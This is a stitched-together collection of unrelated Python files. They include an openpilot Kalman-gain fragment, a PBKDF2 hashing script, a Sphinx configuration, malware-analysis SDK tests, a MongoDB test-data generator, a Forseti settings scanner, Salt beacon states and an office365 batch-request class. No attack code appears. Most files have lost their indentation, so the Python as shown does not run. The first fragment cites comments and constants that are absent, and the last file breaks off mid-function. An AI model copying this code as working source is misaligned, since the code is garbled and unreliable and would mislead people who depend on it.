def get_body_can_parser(CP):
return None
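# A minimal sketch (not part of openpilot, defined here for illustration only) of how a
# steady-state gain like the hard-coded K in CarStateBase could be derived from the
# commented Q and R above; dt mirrors DT_CTRL and the Q/R values are the ones in the comment.
def _steady_state_kalman_gain_sketch(dt=DT_CTRL, q=(10.0, 100.0), r=1e3, iters=5000):
  import numpy as np
  A = np.array([[1.0, dt], [0.0, 1.0]])   # constant-velocity state transition
  C = np.array([[1.0, 0.0]])              # only the first state (speed) is measured
  Q, R = np.diag(q), np.array([[r]])
  P = np.eye(2)
  K = np.zeros((2, 1))
  for _ in range(iters):
    P = A @ P @ A.T + Q                   # predict covariance
    S = C @ P @ C.T + R                   # innovation covariance
    K = P @ C.T @ np.linalg.inv(S)        # Kalman gain
    P = (np.eye(2) - K @ C) @ P           # update covariance
  return K  # converges toward a steady-state gain comparable to the constants used in v_ego_kf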
|
import operator
def main():
print ('Compute algorithm rank')
f = open('../data/join_results/sj.12_30.log.csv')
output_f = open('../data/join_results/sj.12_30.log.ranked.csv', 'w')
header = f.readline()
header = header.strip()
header += ',1st time,2nd time,3rd time,4th time, 1st #splits,2nd #splits,3rd #splits,4th #splits\n'
output_f.writelines(header)
line = f.readline()
while line:
data = line.strip().split(',')
duration = {}
duration['pbsm'] = float(data[9]) if float(data[9]) > 0 else 10000
duration['dj'] = float(data[13]) if float(data[13]) > 0 else 10000
duration['repj'] = float(data[17]) if float(data[17]) > 0 else 10000
duration['bnlj'] = float(data[5]) if float(data[5]) > 0 else 10000
# print (duration)
sorted_duration = sorted(duration.items(), key=operator.itemgetter(1))
# print (sorted_duration)
line = line.strip()
for sorted_entry in sorted_duration:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
split_counts = {}
split_counts['pbsm'] = float(data[8]) if float(data[8]) > 0 else 10000
split_counts['dj'] = float(data[12]) if float(data[12]) > 0 else 10000
split_counts['repj'] = float(data[16]) if float(data[16]) > 0 else 10000
split_counts['bnlj'] = float(data[4]) if float(data[4]) > 0 else 10000
print (split_counts)
sorted_split_counts = sorted(split_counts.items(), key=operator.itemgetter(1))
# print (sorted_duration)
for sorted_entry in sorted_split_counts:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
output_f.writelines('{}\n'.format(line))
line = f.readline()
output_f.close()
f.close()
if __name__ == '__main__':
main()
|
import sys
import hashlib
def check(args):
if len(args) != 2:
print("usage hashme.py <phrase>")
return False
return True
def main(phrase):
salt = 'Km5d5ivMy8iexuHcZrsD'
hash_obj = hashlib.pbkdf2_hmac('sha512', phrase.encode(), salt.encode(), 200000)
print(hash_obj.hex())
if check(sys.argv): main(sys.argv[1])
|
# -*- coding: utf-8 -*-
#
# MongoDB documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 3 09:58:40 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
import sys
import os
import datetime
from sphinx.errors import SphinxError
try:
tags
except NameError:
class Tags(object):
def has(self, *args):
return False
tags = Tags()
# -- General configuration ----------------------------------------------------
needs_sphinx = '1.0'
extensions = [
'sphinx.ext.extlinks',
'sphinx.ext.todo',
]
locale_dirs = []
gettext_compact = False
templates_path = ['.templates']
exclude_patterns = []
source_suffix = '.txt'
master_doc = 'index'
language = 'en'
project = 'mut'
copyright = u'2008-{0}'.format(datetime.date.today().year)
version = '0.1'
release = '0.1'
rst_epilog = '\n'.join([
'.. |copy| unicode:: U+000A9',
'.. |ent-build| replace:: MongoDB Enterprise',
'.. |year| replace:: {0}'.format(datetime.date.today().year),
])
pygments_style = 'sphinx'
extlinks = {
'issue': ('https://jira.mongodb.org/browse/%s', '' ),
'wiki': ('http://www.mongodb.org/display/DOCS/%s', ''),
'api': ('https://api.mongodb.org/%s', ''),
'manual': ('https://docs.mongodb.org/manual%s', ''),
'gettingstarted': ('https://docs.mongodb.org/getting-started%s', ''),
'ecosystem': ('https://docs.mongodb.org/ecosystem%s', ''),
'meta-driver': ('http://docs.mongodb.org/meta-driver/latest%s', ''),
'mms-docs': ('https://docs.cloud.mongodb.com%s', ''),
'mms-home': ('https://cloud.mongodb.com%s', ''),
'opsmgr': ('https://docs.opsmanager.mongodb.com/current%s', ''),
'about': ('https://www.mongodb.org/about%s', ''),
'products': ('https://www.mongodb.com/products%s', '')
}
languages = [
("ar", "Arabic"),
("cn", "Chinese"),
("cs", "Czech"),
("de", "German"),
("es", "Spanish"),
("fr", "French"),
("hu", "Hungarian"),
("id", "Indonesian"),
("it", "Italian"),
("jp", "Japanese"),
("ko", "Korean"),
("lt", "Lithuanian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("tr", "Turkish"),
("uk", "Ukrainian")
]
# -- Options for HTML output ---------------------------------------------------
html_theme = 'nature'
html_title = 'Mut'
htmlhelp_basename = 'MongoDBdoc'
# html_logo = sconf.logo
html_static_path = ['_static']
html_copy_source = False
html_use_smartypants = True
html_domain_indices = True
html_use_index = True
html_split_index = False
html_show_sourcelink = False
html_show_sphinx = True
html_show_copyright = True
html_sidebars = {}
# put it into your conf.py
def setup(app):
# disable versioning for speed
from sphinx.builders.gettext import I18nBuilder
I18nBuilder.versioning_method = 'none'
def doctree_read(app, doctree):
if not isinstance(app.builder, I18nBuilder):
return
from docutils import nodes
from sphinx.versioning import add_uids
list(add_uids(doctree, nodes.TextElement))
app.connect('doctree-read', doctree_read)
|
from unittest.mock import patch
from pydragonfly.sdk.const import ANALYZED, MALICIOUS
from tests.mock_utils import MockAPIResponse
from tests.resources import APIResourceBaseTestCase
from tests.resources.test_analysis import AnalysisResultTestCase
class DragonflyTestCase(APIResourceBaseTestCase):
@property
def resource(self):
return self.df
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.create",
return_value=MockAPIResponse({"id": 1}, 200),
)
def test_analyze_file(self, *args, **kwargs):
ret = self.df.analyze_file(
sample_name="test", sample_buffer=b"test_sample", retrieve_analysis=False
)
self.assertEqual(ret, 1)
@patch(
"pydragonfly.sdk.resources.analysis.Analysis.retrieve",
return_value=MockAPIResponse(AnalysisResultTestCase.result_json, 200),
)
@patch(
"pydragonfly.sdk.resources.report.Report.matched_rules",
return_value=MockAPIResponse(AnalysisResultTestCase.matched_rules_json, 200),
)
def test_analysis_result(self, *args, **kwargs):
result = self.df.analysis_result(12)
self.assertEqual(result.id, 12)
self.assertEqual(result.status, ANALYZED)
self.assertEqual(result.evaluation, MALICIOUS)
self.assertEqual(result.score, 10)
|
from os import listdir
from os.path import isfile, join
import numpy as np
import random
import string
from pymongo import MongoClient
from models.user import User
from models.channel import *
from models.workspace import Workspace
from models.settings import *
# Setup Mongo client
class MongoDatabase:
def __init__(self):
self.client = MongoClient("mongodb://localhost:27017/")
self.db = self.client['slack_database']
self.user_col = self.db['user_col']
self.direct_col = self.db['direct_col']
self.workspace_col = self.db['workspace_col']
class Generator:
def __init__(self):
self.mongo = MongoDatabase()
def generate_random_string(self, size: int=10):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=size))
def generate_random_number(self, size: int=9):
return random.randint(1, 10**size)
def generate_random_message(self):
words = [self.generate_random_string() for i in range(random.randint(3,10))]
return ' '.join(words)
def generate_random_user(self):
name = self.generate_random_string()
user = User(name)
settings = UserSetting()
settings.notifications = self.generate_notifications()
settings.language = self.generate_random_language()
settings.time_zone = self.generate_random_timezone()
user.settings = settings
return user
def generate_random_channel(self):
name = self.generate_random_string()
channel = Channel(name)
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
channel.settings = settings
return channel
def generate_random_direct_channel(self, n_messages: int = 10):
user_pair = [i for i in self.mongo.user_col.aggregate([{'$sample':{'size':2}}])]
dc = DirectChannel(user_pair[0], user_pair[1])
dc.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
dc.archive = self.generate_random_archive()
dc.messages = [self.generate_random_message() for _ in range(n_messages)]
settings = ChannelSetting()
settings.censored_words = [self.generate_random_string() for i in range(random.randint(3,10))]
settings.archive = self.generate_random_archive()
dc.settings = settings
return dc
def generate_random_workspace(self, n_users: int = 10, n_channels: int = 10, n_msgs_per_chnl: int = 20):
workspace_name = self.generate_random_string()
workspace = Workspace(workspace_name)
workspace.member_ids = [i['user_id'] for i in self.mongo.user_col.aggregate([{'$sample':{'size':n_users}}])]
workspace.channels = [self.generate_random_channel() for _ in range(n_channels)]
for channel in workspace.channels:
channel.name = self.generate_random_string()
channel.messages = [self.generate_random_message() for _ in range(n_msgs_per_chnl)]
return workspace
# For Settings
def generate_random_language(self):
language_list = ["German","English","Spanish","French","Italian","Portuguese","Russian","Japanese","Chinese","Korean"]
return random.choice(language_list)
def generate_random_timezone(self):
timezones = ['EST', 'CST', 'MST', 'PST', 'AST', 'AKST', 'HST']
return random.choice(timezones)
def generate_notifications(self):
return bool(random.getrandbits(1))
def generate_random_archive(self):
return bool(random.getrandbits(1))
def random_data_test(user_count: int=1000, workspace_count: int=100, channel_count: int=5,
direct_channel_count: int=400, n_msgs_per_chnl: int=50):
'''
Creates a database with the given number of users, workspaces, channels per workspace, direct channels, and messages per channel
'''
g = Generator()
mongo = MongoDatabase()
# make users
for _ in range(user_count):
user = g.generate_random_user()
mongo.user_col.insert_one({
'user_id': user.user_id,
'name': user.name,
'settings': {'notifications': user.settings.notifications,
'language': user.settings.language,
'time_zone': user.settings.time_zone}})
# make direct channels with messages
for _ in range(direct_channel_count):
dc = g.generate_random_direct_channel(n_msgs_per_chnl)
mongo.direct_col.insert_one({'member_ids': list(dc.member_ids), # NOTE: CHANGING FROM SET To LIST
'messages': dc.messages,
'settings':{'censored_words': list(dc.settings.censored_words), # NOTE: CHANGING FROM SET To LIST
'archive': dc.settings.archive}})
# make workspaces with members and channels and messages
for _ in range(workspace_count):
workspace = g.generate_random_workspace(10, channel_count, n_msgs_per_chnl)
mongo.workspace_col.insert_one({'name':workspace.name,
'members':workspace.member_ids,
'channels': {channel.name: channel.messages for channel in workspace.channels},})
# TODO: Insert settings into workspace channels
def main():
mongo = MongoDatabase()
mongo.client.drop_database('slack_database')
random_data_test()
if __name__ == '__main__':
main()
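# A quick verification sketch (illustrative; run after random_data_test() has populated the database):
#
#     mongo = MongoDatabase()
#     print(mongo.user_col.count_documents({}))       # ~1000 users by default
#     print(mongo.direct_col.count_documents({}))     # ~400 direct channels by default
#     print(mongo.workspace_col.count_documents({}))  # ~100 workspaces by default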
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Scanner for the GroupsSettings rules engine."""
import json
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.scanner.audit import groups_settings_rules_engine
from google.cloud.forseti.scanner.scanners import base_scanner
LOGGER = logger.get_logger(__name__)
class GroupsSettingsScanner(base_scanner.BaseScanner):
"""Scanner for GroupsSettings data."""
def __init__(self, global_configs, scanner_configs, service_config,
model_name, snapshot_timestamp, rules):
"""Initialization.
Args:
global_configs (dict): Global configurations.
scanner_configs (dict): Scanner configurations.
service_config (ServiceConfig): Forseti 2.0 service configs
model_name (str): name of the data model
snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ.
rules (str): Fully-qualified path and filename of the rules file.
"""
super(GroupsSettingsScanner, self).__init__(
global_configs,
scanner_configs,
service_config,
model_name,
snapshot_timestamp,
rules)
self.rules_engine = (groups_settings_rules_engine.
GroupsSettingsRulesEngine(
rules_file_path=self.rules,
snapshot_timestamp=self.snapshot_timestamp))
self.rules_engine.build_rule_book(self.global_configs)
@staticmethod
def _flatten_violations(violations):
"""Flatten RuleViolations into a dict for each RuleViolation member.
Args:
violations (list): The RuleViolations to flatten.
Yields:
dict: Iterator of RuleViolations as a dict per member.
"""
for violation in violations:
resource_data = {
'whoCanAdd': violation.whoCanAdd,
'whoCanJoin': violation.whoCanJoin,
'whoCanViewMembership': violation.whoCanViewMembership,
'whoCanViewGroup': violation.whoCanViewGroup,
'whoCanInvite': violation.whoCanInvite,
'allowExternalMembers': violation.allowExternalMembers,
'whoCanLeaveGroup': violation.whoCanLeaveGroup,
}
yield {
'resource_id': violation.group_email,
'full_name': violation.group_email,
'resource_name': violation.group_email,
'resource_data': json.dumps(resource_data, sort_keys=True),
'violation_data': violation.violation_reason,
'resource_type': violation.resource_type,
'rule_index': violation.rule_index,
'rule_name': violation.rule_name,
'violation_type': violation.violation_type,
}
def _output_results(self, all_violations):
"""Output results.
Args:
all_violations (list): All violations.
"""
all_violations = list(self._flatten_violations(all_violations))
self._output_results_to_db(all_violations)
def _find_violations(self, all_groups_settings, iam_groups_settings):
"""Find violations in the settings.
Args:
all_groups_settings (list): GroupsSettings list to find violations
in.
iam_groups_settings (list): GroupsSettings list for only those
groups settings that have at least 1 iam policy, to find violations
in.
Returns:
list: All violations.
"""
all_violations = []
LOGGER.info('Finding groups settings violations...')
for settings in all_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=False)
LOGGER.debug(violations)
all_violations.extend(violations)
for settings in iam_groups_settings:
violations = self.rules_engine.find_violations(settings,
iam_only=True)
LOGGER.debug(violations)
all_violations.extend(violations)
return all_violations
def _retrieve(self):
"""Runs the data collection.
Returns:
            tuple: 2 lists of GroupsSettings objects, 1 with all groups
            settings and 1 only for settings that have at least 1 iam policy.
Raises:
ValueError: if resources have an unexpected type.
"""
all_groups_settings = []
iam_groups_settings = []
model_manager = self.service_config.model_manager
scoped_session, data_access = model_manager.get(self.model_name)
with scoped_session as session:
for settings in data_access.scanner_fetch_groups_settings(session,
True):
email = settings[0].split('group/')[1]
iam_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
for settings in data_access.scanner_fetch_groups_settings(session,
False):
email = settings[0].split('group/')[1]
all_groups_settings.append(groups_settings.GroupsSettings
.from_json(email, settings[1]))
return (all_groups_settings, iam_groups_settings)
def run(self):
"""Run, the entry point for this scanner."""
all_groups_settings, iam_groups_settings = self._retrieve()
all_violations = self._find_violations(all_groups_settings,
iam_groups_settings)
self._output_results(all_violations)
|
import unittest
from os.path import abspath, join
from robot import api, model, parsing, reporting, result, running
from robot.utils.asserts import assert_equals
class TestExposedApi(unittest.TestCase):
def test_test_case_file(self):
assert_equals(api.TestCaseFile, parsing.TestCaseFile)
def test_test_data_directory(self):
assert_equals(api.TestDataDirectory, parsing.TestDataDirectory)
def test_resource_file(self):
assert_equals(api.ResourceFile, parsing.ResourceFile)
def test_test_data(self):
assert_equals(api.TestData, parsing.TestData)
def test_execution_result(self):
assert_equals(api.ExecutionResult, result.ExecutionResult)
def test_test_suite(self):
assert_equals(api.TestSuite, running.TestSuite)
def test_result_writer(self):
assert_equals(api.ResultWriter, reporting.ResultWriter)
def test_visitors(self):
assert_equals(api.SuiteVisitor, model.SuiteVisitor)
assert_equals(api.ResultVisitor, result.ResultVisitor)
class TestTestSuiteBuilder(unittest.TestCase):
sources = [join(abspath(__file__), '..', '..', '..', 'atest', 'testdata', 'misc', n)
for n in ('pass_and_fail.robot', 'normal.robot')]
def test_create_with_datasources_as_list(self):
suite = api.TestSuiteBuilder().build(*self.sources)
assert_equals(suite.name, 'Pass And Fail & Normal')
def test_create_with_datasource_as_string(self):
suite = api.TestSuiteBuilder().build(self.sources[0])
assert_equals(suite.name, 'Pass And Fail')
if __name__ == '__main__':
unittest.main()
|
from PIL import Image
import os
percent = 0.5
for file_name in os.listdir("../foto/"):
if file_name == "pic8.jpg":
img = Image.open("../foto/"+str(file_name))
        if img.size[0] > img.size[1]:
            # landscape photo
            hsize = int((float(img.size[0]) * float(percent)))
            vsize = int((float(img.size[1]) * float(percent)))
        else:
            # portrait photo (currently scaled the same way as landscape)
            hsize = int((float(img.size[0]) * float(percent)))
            vsize = int((float(img.size[1]) * float(percent)))
img = img.resize((hsize, vsize), Image.ANTIALIAS)
img.save(file_name)
|
import sqlite3
from contextlib import closing
with closing(sqlite3.connect('sample.db')) as conn:
c = conn.cursor()
c.execute('create table users (id integer primary key, name varchar, age integer, gender varchar)')
c.executemany('insert into users (name, age, gender) values (?, ?, ?)', [
('Alex', 54, 'male'),
('Nancy', 40, 'female'),
('Tetsu', 16, 'male'),
('Saki', 21, 'female')
])
conn.commit()
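
# Hedged follow-up sketch: reading the inserted rows back out again
# (assumes the script above has already created sample.db in the
# working directory).
with closing(sqlite3.connect('sample.db')) as conn:
    c = conn.cursor()
    for row in c.execute('select id, name, age, gender from users'):
        print(row)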
|
"""
Here come the tests for attention types and their compatibility
"""
import unittest
import torch
from torch.autograd import Variable
import onmt
class TestAttention(unittest.TestCase):
def test_masked_global_attention(self):
source_lengths = torch.IntTensor([7, 3, 5, 2])
# illegal_weights_mask = torch.ByteTensor([
# [0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 1, 1, 1, 1],
# [0, 0, 0, 0, 0, 1, 1],
# [0, 0, 1, 1, 1, 1, 1]])
batch_size = source_lengths.size(0)
dim = 20
memory_bank = Variable(torch.randn(batch_size,
source_lengths.max(), dim))
hidden = Variable(torch.randn(batch_size, dim))
attn = onmt.modules.Attention(dim)
_, alignments = attn(hidden, memory_bank,
memory_lengths=source_lengths)
# TODO: fix for pytorch 0.3
# illegal_weights = alignments.masked_select(illegal_weights_mask)
# self.assertEqual(0.0, illegal_weights.data.sum())
|
"""Environment wrapper class for logging episodes.
This can be used to record data from a subject playing the task. See
../../moog_demos/restore_logged_data.py for an example of how to read log files.
Note: This logger records everything about the environment, which can be a lot
of data (depending on the task). If you plan to use this at scale for recording
subjects' or agents' behavior, we recommend forking this and modifying it to
only log the data that you need to do analyses for your specific task. For
example, you may not want to log the positions/velocities of static sprites
(e.g. walls), or may not want to log all the attributes of sprites every
timestep (e.g. if you know that the colors of the sprites don't change in your
task).
"""
import copy
from datetime import datetime
import json
import logging
import numpy as np
import os
import time
from moog import env_wrappers
from moog import sprite
# This is the number of numerals in filenames. Since there is one file per
# episode, you should pick _FILENAME_ZFILL large enough that the number of
# episodes in your dataset is less than 10^_FILENAME_ZFILL.
_FILENAME_ZFILL = 5
class VertexLogging():
NEVER = 'NEVER'
ALWAYS = 'ALWAYS'
WHEN_NECESSARY = 'WHEN_NECESSARY'
def _serialize(x):
"""Serialize a value x.
This is used to serialize sprite attributes, actions, and meta_state so that
they are json-writable.
Specifically, numpy arrays are not JSON serializable, so we must convert
numpy arrays to lists. This function is recursive to handle nestings inside
of lists/tuples/dictionaries.
Args:
x: Value to serialize.
Returns:
Serialized value that can be JSON dumped.
"""
if isinstance(x, np.ndarray):
return x.tolist()
elif isinstance(x, (np.float32, np.float64)):
return float(x)
elif isinstance(x, (np.int32, np.int64)):
return int(x)
elif isinstance(x, list):
return [_serialize(a) for a in x]
elif isinstance(x, tuple):
return tuple([_serialize(a) for a in x])
elif isinstance(x, dict):
return {k: _serialize(v) for k, v in x.items()}
else:
return x
class LoggingEnvironment(env_wrappers.AbstractEnvironmentWrapper):
"""Environment class for logging timesteps.
This logger produces a description of the log in 'description.txt' of
log_dir, so please refer to that for a detailed account of the structure of
the logs.
"""
def __init__(self, environment, log_dir='logs',
log_vertices='WHEN_NECESSARY'):
"""Constructor.
Args:
environment: Instance of ../moog/environment.Environment.
log_dir: String. Log directory relative to working directory.
log_vertices: String. Of the following options:
* 'NEVER'. In this case, never log sprite vertices.
* 'WHEN_NECESSARY'. In this case, log sprite vertices when a
sprite has either just appeared or just changed shape. In
this way, the vertices of a sprite can always be inferred
from the current position/angle/aspect_ratio and the
vertices that were logged for that sprite (identifiable by
its id) the last time its vertices were logged.
* 'ALWAYS'. Log vertices for all sprites every timestep.
"""
super(LoggingEnvironment, self).__init__(environment)
# Make sure log_vertices is a valid value
if not hasattr(VertexLogging, log_vertices):
raise ValueError('log_vertices is {} but must be in VertexLogging '
'values'.format(log_vertices))
self._log_vertices = log_vertices
# Set the logging directory
now_str = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
if log_dir[0] == '/':
log_dir = os.path.join(log_dir, now_str)
else:
log_dir = os.path.join(os.getcwd(), log_dir, now_str)
os.makedirs(log_dir)
self._log_dir = log_dir
# These are the attributes that we'll log
self._attributes = list(sprite.Sprite.FACTOR_NAMES) + ['id']
# Log attribute list
attributes_filename = os.path.join(self._log_dir, 'attributes.txt')
logging.info('Logging attribute list {} to {}.'.format(
self._attributes, attributes_filename))
with open(attributes_filename, 'w') as f:
json.dump(self._attributes, f)
# Log description
self._log_description()
# Initialize self._episode_log
self._episode_count = 0
self._episode_log = []
def _log_description(self):
"""Log a description of the data to a description.txt file."""
description_filename = os.path.join(self._log_dir, 'description.txt')
logging.info('Logging description to {}.'.format(description_filename))
description = (
'Each numerical file in this directory is an episode of the task. '
'Each such file contains a json-serialized list, each element of '
'which represents an environment step in the episode. Each step is '
            'a list of six elements, [[`time`, time], [`reward`, reward], '
            '[`step_type`, step_type], [`action`, action], [`meta_state`, '
            'meta_state], state].'
'\n\n'
'\n\n'
'time is a timestamp of the timestep.'
'\n\n'
'\n\n'
'reward contains the value of the reward at that step.'
'\n\n'
'\n\n'
'step_type indicates the dm_env.StepType of that step, i.e. '
'whether it was first, mid, or last.'
'\n\n'
'\n\n'
'action contains the agent action for the step.'
'\n\n'
'\n\n'
'meta_state is the serialized meta_state of the environment.'
'\n\n'
'\n\n'
'state is a list, each element of which represents a layer in the '
'environment state. The layer is represented as a list [k, [], [], '
'[], ...], where k is the layer name and the subsequent elements '
'are serialized sprites. Each serialized sprite is a list of '
'attributes. See attributes.txt for the attributes contained.'
)
if self._log_vertices == VertexLogging.ALWAYS:
description += (
' Furthermore, a list of vertices is appended to the attribute '
'list for each serialized sprite.'
)
elif self._log_vertices == VertexLogging.WHEN_NECESSARY:
description += (
'\n\n'
'\n\n'
                'Furthermore, a list of vertices is appended to the attribute '
                'list for a serialized sprite for the first timestep in which '
                'that sprite appears, or when the sprite has changed shape.'
)
with open(description_filename, 'w') as f:
f.write(description)
def _serialize_sprite(self, s):
"""Serialize a sprite as a list of attributes."""
attributes = [_serialize(getattr(s, x)) for x in self._attributes]
if (self._log_vertices == VertexLogging.ALWAYS or
(self._log_vertices == VertexLogging.WHEN_NECESSARY and
s.just_set_shape)):
attributes.append(s.vertices.tolist())
s.just_set_shape = False
return attributes
def _serialized_state(self):
"""Serialized a state."""
serialized_state = [
[k, [self._serialize_sprite(s) for s in self.state[k]]]
for k in self.state
]
return serialized_state
def step(self, action):
"""Step the environment with an action, logging timesteps."""
timestep = self._environment.step(action)
str_timestep = (
[['time', time.time()],
['reward', timestep.reward],
['step_type', timestep.step_type.value],
['action', _serialize(action)],
['meta_state', _serialize(self._environment.meta_state)],
self._serialized_state()]
)
self._episode_log.append(str_timestep)
if timestep.last():
# Write the episode to a log file
episode_count_str = str(self._episode_count).zfill(_FILENAME_ZFILL)
filename = os.path.join(self._log_dir, episode_count_str)
logging.info('Logging episode {} to {}.'.format(
self._episode_count, filename))
with open(filename, 'w') as f:
json.dump(self._episode_log, f)
self._episode_count += 1
self._episode_log = []
return timestep
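
# Hedged reading sketch (not part of the original wrapper): the description
# written by _log_description says each numerical file in the log directory is
# a json-serialized list of steps. The path below is hypothetical; substitute
# a real log directory produced by LoggingEnvironment.
if __name__ == '__main__':
    example_episode_path = os.path.join('logs', 'example_timestamp', '00000')
    if os.path.exists(example_episode_path):
        with open(example_episode_path, 'r') as f:
            episode = json.load(f)
        # Each step is [[`time`, t], [`reward`, r], [`step_type`, s],
        # [`action`, a], [`meta_state`, m], state].
        print('Steps in episode:', len(episode))
        print('First step keys:', [entry[0] for entry in episode[0][:-1]])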
|
# -*- coding: utf-8 -*-
'''
Management of the Salt beacons
==============================
.. versionadded:: 2015.8.0
.. code-block:: yaml
ps:
beacon.present:
- save: True
- enable: False
- services:
salt-master: running
apache2: stopped
sh:
beacon.present: []
load:
beacon.present:
- averages:
1m:
- 0.0
- 2.0
5m:
- 0.0
- 1.5
15m:
- 0.1
- 1.0
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import Salt libs
from salt.ext import six
import logging
log = logging.getLogger(__name__)
def present(name,
save=False,
**kwargs):
'''
Ensure beacon is configured with the included beacon data.
name
        The name of the beacon to ensure is configured.
    save
        True/False, if True the beacons.conf file will be updated too. Default is False.
'''
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
beacon_data = [{k: v} for k, v in six.iteritems(kwargs)]
if name in current_beacons:
if beacon_data == current_beacons[name]:
ret['comment'].append('Job {0} in correct state'.format(name))
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
ret['changes'] = result['changes']
else:
result = __salt__['beacons.modify'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
if 'changes' in result:
ret['comment'].append('Modifying {0} in beacons'.format(name))
ret['changes'] = result['changes']
else:
ret['comment'].append(result['comment'])
else:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.add'](name, beacon_data, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Adding {0} to beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def absent(name,
save=False,
**kwargs):
'''
Ensure beacon is absent.
name
        The name of the beacon to ensure is absent.
    save
        True/False, if True the beacons.conf file will be updated too. Default is False.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.delete'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.delete'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Removed {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not configured in beacons'.format(name))
if save:
if __opts__.get('test'):
ret['comment'].append('Beacon {0} would be saved'.format(name))
else:
result = __salt__['beacons.save']()
ret['comment'].append('Beacon {0} saved'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def enabled(name, **kwargs):
'''
Enable a beacon.
name
The name of the beacon to enable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.enable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.enable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Enabled {0} from beacons'.format(name))
else:
ret['comment'].append('{0} not a configured beacon'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
def disabled(name, **kwargs):
'''
Disable a beacon.
name
The name of the beacon to disable.
'''
### NOTE: The keyword arguments in **kwargs are ignored in this state, but
### cannot be removed from the function definition, otherwise the use
### of unsupported arguments will result in a traceback.
ret = {'name': name,
'result': True,
'changes': {},
'comment': []}
current_beacons = __salt__['beacons.list'](return_yaml=False, **kwargs)
if name in current_beacons:
if __opts__.get('test'):
kwargs['test'] = True
result = __salt__['beacons.disable_beacon'](name, **kwargs)
ret['comment'].append(result['comment'])
else:
result = __salt__['beacons.disable_beacon'](name, **kwargs)
if not result['result']:
ret['result'] = result['result']
ret['comment'] = result['comment']
return ret
else:
ret['comment'].append('Disabled beacon {0}.'.format(name))
else:
ret['comment'].append('Job {0} is not configured.'.format(name))
ret['comment'] = '\n'.join(ret['comment'])
return ret
|
import json
import re
from email import message_from_bytes
from email.message import Message
from office365.runtime.client_request import ClientRequest
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.http.request_options import RequestOptions
from office365.runtime.queries.batch_query import BatchQuery, create_boundary
class ODataBatchRequest(ClientRequest):
def __init__(self, context):
super(ODataBatchRequest, self).__init__(context)
def build_request(self, query):
"""
:type query: office365.runtime.queries.client_query.BatchQuery
"""
url = "{0}$batch".format(self.context.service_root_url())
request = RequestOptions(url)
request.method = HttpMethod.Post
media_type = "multipart/mixed"
content_type = "; ".join([media_type, "boundary={0}".format(query.current_boundary)])
request.ensure_header('Content-Type', content_type)
request.data = self._prepare_payload(query).as_bytes()
return request
def process_response(self, response, query):
"""Parses an HTTP response.
:type response: requests.Response
:type query: office365.runtime.queries.client_query.BatchQuery
"""
content_id = 0
for response_info in self._read_response(response):
if response_info["content"] is not None:
qry = query.get(content_id)
self.context.pending_request().map_json(response_info["content"], qry.return_type)
content_id += 1
def _read_response(self, response):
"""Parses a multipart/mixed response body from from the position defined by the context.
:type response: requests.Response
"""
content_type = response.headers['Content-Type'].encode("ascii")
http_body = (
b"Content-Type: "
+ content_type
+ b"\r\n\r\n"
+ response.content
)
